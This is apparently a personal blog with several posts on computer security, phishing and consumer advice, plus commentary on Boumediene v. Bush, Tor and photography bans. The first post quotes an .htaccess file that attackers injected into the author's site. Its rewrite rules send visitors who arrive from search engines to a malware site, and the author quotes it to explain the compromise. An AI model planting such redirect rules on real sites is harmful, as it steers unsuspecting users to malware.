So this website was compromised

So this website (mattmullen.net) was compromised recently, oddly enough. I guess those hackers were just too excited by the prospect of my traffic at upwards of 2 hits per day redirected to their malware site. It's quite a honeypot.

Anyway, here's all they did: they injected an .htaccess in the root with the following data:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]

RewriteRule .* http://[IP Address of malware site]/in.html?s=xx [R,L]

Which made my site accessable by direct link or bookmark, but you couldn't click-through from a major search engine without getting redirected to a fake spyware-removal app.

I've replaced the bad files, changed my passwords, and scanned all my machines for malware (0 hits), so my best guess is that they somehow got my ftp address, or compromised the host company and infected many of their users.

Cory references X references Cory

Cory Doctorow seems to be caught in an elaborate palindrome with the internet. Today I noticed it with Bruce Schneier.

Of course Cory already blogged about Bruce's blog (and he must have referenced Bruce in Little Brother, I'm sure ... almost sure... ok, not sure). Today Bruce blogged about gait recognition applied to shadows read by satellites, and he threw Cory a bone with a link back to Little Brother's discussion of low-tech gait recognition defeating techniques (i.e., rocks in shoes).

Cory already played this palindromatic game with Randall Munroe's webcomic. Cory blogs XKCD (actually a few times), XKCD comics Cory¹, then the comic is cosplayed by Cory and readers alike.

If the rate of references continues to accelerate, this could become an internet stability problem. Let's call it the Doctorow Vortex. Who will make a wikipedia page about it for me?

1. Yes, 'comic' can be used as a verb, just like blog. Thanks for asking.

How to stay safe on the dangerous internet

I get asked a lot of questions about viruses (virii?), malware, and computer security by friends, family, & co-workers. I like to try to keep my advice as simple as possible for people who don't really want to learn all the complexities of computer hardware, software & networks - not that I could know every detail myself, anyhow.

I summarize it with 3 bullets. Here's how I stay safe on the dangerous internet:

1. Don't open file attachments that you aren't expecting.
   
2. Don't click links provided in emails that you aren't expecting.
3. If a website or popup requests you to click somewhere, close it with ALT-F4.

I'll elaborate now on the details, but for those of you who need it simple, those bullets will go a long way.

Regarding item 1, Virus protection: I keep hearing people saying "only open attachments from your friends." Here's why that's foolish: when a virus infects a computer, it can replicate itself by emailing it to everyone in your contact list. That means an attachment is almost more likely to be a virus if it's from your friends than otherwise.

I say "only trust attachments that you are expecting." I mean that you are safest if you've already had a discussion with someone in person, on the phone, in IM, or in email that says "I've got that file you need. I'll email it to you." If that hasn't happened, be wary.

You have more leeway if you know how to spot dangerous attachments. As of September 2008, the only real dangerous attachments are files that contain executable computer instructions: i.e., files that end with .exe or .scr (and perhaps also .com and .bat - if these are still executable on modern windows operating systems). That list could grow if exploits are found in other software products (see JPEG virus attack), and it could include Microsoft Office documents if your macro security is too low. Try not to fall for the double-extension trick, though. A file called britney.jpg.exe is an EXE, not a JPG. The final extension always wins, even when it is invisible.

Regarding item #2, phishing protection: I just got another great phishing scam email today. It was from equifax, a company I have done business with. It was from a good email address (possible because of spoofing), it made a reasonable request (log in and update information), and it provided a link to eport.equifax.com, a valid website. However, if I read the HTML email source, I find the link lies about what it links to. It actually links to eport.equifax.file3.com - which is a completely different host owned by scammers collecting personal financial data. If you don't know how to examine URLs to recognize URL spoof attacks, it's safest to follow #2 and avoid clicking emailed URLs you're not expecting. If you want to click a untrusted link, instead try opening your browser and typing in the desired website directly - you're less likely to be redirected to phishers that way.

Don't let emotions block reason. The ILoveYou virus and the common "You've received an eCard from a friend!" emails play on people's emotional desires to have positive social interaction. A good eCard site should at least provide the name & email of the card sender before they ask you to click links, to help validate the message. Also, be logical - if your birthday isn't for 8 months, who would send an eCard today?

Regarding item #3, malware protection: when websites popup windows asking you to click anywhere, they may be trying to get your authorization to install malware, whether or not they say it. Clicking anywhere on these windows is dangerous, because sometimes they are imagemaps that pretend to be windows with closeboxes but actually act like a big hidden "OK" button. Using the keyboard to close them (ALT-F4 in windows, CTL-F4 if it's a tab in a tabbed browser) is much safer than clicking anywhere on them.

It's also good to note that malware often comes bundled with "free" software. You should question any free software product available on the web, especially if it's advertised. Where does a company get money to pay for advertising for a product that's given away for free? They get money from malware writers that pay them to infect your computer and collect your data, and/or send you popup advertising even when you're not browsing. Gator was a company that was expert at this; now they've changed their name to Claria to flee bad press.

If you're unsure, err on the side of caution. Do you really need that custom browser toolbar or the little weather application? Is it worth risking your security?

Wrap-up: I considered adding more bullets to the list. Item #4 might be "keep your software up-to-date". I'm trying to be concise, though. A lot of home users aren't running professional operating systems with web services running, so they are less exposed to worms. I could add items like "set your boot priority list to boot only from hard disk", but the goal is internet security, and not many people are still getting infected from removable storage media.

Good luck and happy safe browsing.

Comments? Suggestions? send them to matt@mattmullen.net.

FTC: Here to protect consumers, after it protects business

I'm a little annoyed with the Federal Trade Commission for pulling the plug on their credit card review service for consumers. Months ago, when visiting their website, I found a comprehensive spreadsheet of available banks offering credit cards. The spreadsheet compared all the important details - APR, hidden fees, credit report rating necessary to acquired the card, et cetera.

Apparently it's all been yanked - now they just have tips for choosing cards. Why take this information down? If it's out of date, it should be updated. If there's no funding to update it, it should be marked as historical, but not deleted. I hope the reason is not because the FTC is more interested in protecting predatory lenders than consumers.

The FTC talks about avoiding credit card fraud, too, but I had a laugh at this instruction:

Carry your cards separately from your wallet, in a zippered compartment, a business card holder, or another small pouch.

Wait - a wallet is a "small pouch" with "compartments" and "card holders". They just defined a wallet for you to put your cards in, while telling you not to put your cards in your wallet. ...so I should just carry two wallets? ...and I should put a sign on one pocket telling pickpockets that I prefer if they steal the neutral wallet? good tip. Thanks, FTC.

I had my cards stolen by a thief once who made some charges to my account and used my identity to get credit on a number of purchases. You know what my biggest problem was? My bank decided I wasn't honest with them when I reported my card stolen, so they didn't follow the proper practices that would protect me. Instead they decided I had just lost my card, and issued a new one. Thanks, Wells Fargo. Customers love when you call them liars and don't take security seriously.

Ridiculous security: FakeTV

The FakeTV simulates a real TV's light output, so that burglers will think you're home watching TV when you're really away.

I think I already have one of these. It's called a real TV. Why would anyone buy this?

http://www.faketv.com/

Boumediene v. Bush: justice Kennedy lays it down

I'm glad about the ruling in Boumediene v. Bush, and have been pleased with a few quotes I've seen from the opinion of the court written by justice Kennedy.

I've heard a lot of the opposing viewpoint, and want to list my thoughts below.

Here are some important source documents:

You can read the syllabus and the decision on the web: syllabus of Boumediene v. Bush

You can also see how the framers of the US government thought a fair society should be built, based on the Declaration of independence, the bill of rights, and the constitution.

Boumediene v Bush is about people captured in Afghanistan and abroad that the government says are dangerous and can be held indefinitely, without trial, and without the right of habeas corpus (to seek relief of illegal detention). Bush says it's legal because a majority-Republican congress passed a bill in 2005 that read:

the President is authorized “to use all necessary and appropriate force against those nations, organizations, or persons he determines planned,authorized, committed, or aided the terrorist attacks that occurred on September 11, 2001, or harbored such organizations or persons, in order to prevent any future acts of international terrorism against the United States by such nations, organizations or persons.”

But the Bill of Right says:

"No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a Grand Jury, except in cases arising in the land or naval forces, or in the Militia, when in actual service in time of War or public danger; nor shall any person be subject for the same offense to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation."

And the declaration of independence says:

"We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the pursuit of Happiness. — That to secure these rights, Governments are instituted among Men, deriving their just powers from the consent of the governed, — That whenever any Form of Government becomes destructive of these ends, it is the Right of the People to alter or to abolish it, and to institute new Government, laying its foundation on such principles and organizing its powers in such form, as to them shall seem most likely to effect their Safety and Happiness."

I read that to mean that, until we tear up the constitution, a person can't be imprisoned unless his crime is presented before a jury and he's given due process of law. Amendment 6 even guarantees the trial will be speedy and public (not secret tribunal).

Some would argue that these only apply to citizens, but I see no way of claiming a foreign person is less deserving of rights than a local - otherwise we don't hold those truths to be self-evident.

Others would argue that it makes allowances during times of war, but the USA is not at war with Afghanistan, and the petitioners are not citizens or soldiers of any nation with which the USA could be at war. If we were at war, then they are P.O.W.s. I cover that below.

If the government detains dangerous criminals, the government must have reason to believe they are criminals. They can show that reason (evidence) to a judge or jury and rule on their punishment if convicted. With no evidence, and no jury, there is nothing proving that the government is not detaining innocent people - this should be unacceptable to any reasonable person.

Some may argue that Guantanamo bay detainees are P.O.W.s and may be treated differently than citizens. However, the USA must actually be at war to hold prisoners of war. We're not at war. Some argue we're at war on Terror. We're not. Hostage-takers are terrorists. The police have been handling them since Hammurabi etched some laws on tablets. That's not war.

If there was a war on terror, the war would never be over, as there are always potential terrorists at home and abroad. That would completely eliminate the 5th amendment to the constitution. Article 7 states that an amendment may not be eliminated without a 2/3 vote in both houses of congress.

But we can play devil's advocate. Let's say Guantanamo bay detainees are POWs even though they aren't. That would mean they are subject to protections agreed upon at the third geneva convention:

They "shall in all circumstances be treated humanely," and "the following acts are and shall remain prohibited: violence to life and person; cruel treatment and torture; humiliating and degrading treatment; the passing of sentences and the carrying out of executions without previous judgment pronounced by a regularly constituted court affording all the judicial guarantees which are recognized as indispensable by civilized peoples."

It's clear that Guantanamo detainees are not having sentences carried out with judgment pronounced by a regular constituted court affording all judicial guaranties recognized by civilized people - a direct violation of the 3rd Geneva Convention.

The last argument left for conservatives is that the detainees are neither POWs nor citizens - they are enemy combatants. The International Criminal Tribunal disagrees (and so do I), citing it's interpretation of the Geneva conventions:

"Every person in enemy hands must have some status under international law: he is either a prisoner of war and, as such, covered by the Third [Geneva] Convention, a civilian covered by the Fourth [Geneva] Convention, or again, a member of the medical personnel of the armed forces who is covered by the First Convention. There is no intermediate status; nobody in enemy hands can be outside the law."

George Bush can't just make up terms with which to classify people so that he can act outside of the law. It's a travesty that so many Americans think he can, and it's an assault on our constitution that over 40% of the supreme court thinks he can delete habeas corpus at will. Anyone who loves America should be outraged at our administrations attacks on America's core values.

Tor semi-works

The EFF is great and so is Tor, but it's definitely not 100% useful. I've let Tor encrypt my traffic lately to test it out. It's highly functional, easy to install, and the graphic feedback is great.

However, it's clearly slower - I feel a little like I'm back on a modem in 1998's internet. On top of that, some websites are watching the source data requests and modifying their output. For instance, when I use Tor, google keeps changing languages on me. Another US Government-funded site rejected me altogether, telling me it only took requests from USA IP addresses.

This is actually the fault of the Government site, of course - Americans should be allowed to conduct their business whether they are currently in the states or abroad (or anonymized) - but it makes Tor harder to use.

Terrorists don't take pictures as much as photographers

You may have been following news stories that show security guards harassing citizens in malls, libraries, and train stations across the country. Here's a good one where, while the railway authority insists on-camera that they don't ban photography, they are interrupted by a security guard demanding that the camera be turned off.

Bruce Schneier is brilliant (as always) in his discussion of the ban on photography in the effort to stop terrorists:

Except that it's nonsense. The 9/11 terrorists didn't photograph anything. Nor did the London transport bombers, the Madrid subway bombers, or the liquid bombers arrested in 2006. Timothy McVeigh didn't photograph the Oklahoma City Federal Building. The Unabomber didn't photograph anything; neither did shoe-bomber Richard Reid. Photographs aren't being found amongst the papers of Palestinian suicide bombers. The IRA wasn't known for its photography. Even those manufactured terrorist plots that the US government likes to talk about -- the Ft. Dix terrorists, the JFK airport bombers, the Miami 7, the Lackawanna 6 -- no photography.

Given that real terrorists, and even wannabe terrorists, don't seem to photograph anything, why is it such pervasive conventional wisdom that terrorists photograph their targets? Why are our fears so great that we have no choice but to be suspicious of any photographer?

Credit card security

I had to pay a fine for a stop sign violation, and was first glad to see I could log onto the court website and pay without writing a check.

Then I considered every headline I've read of privacy bungling & data exposure committed by both corporate America and various global governments. I was sure that it would be mere months before my unencrypted credit card information was mailed somewhere random, left on an unattended laptop to be stolen, or just posted to the internet.

I think I better just write a check.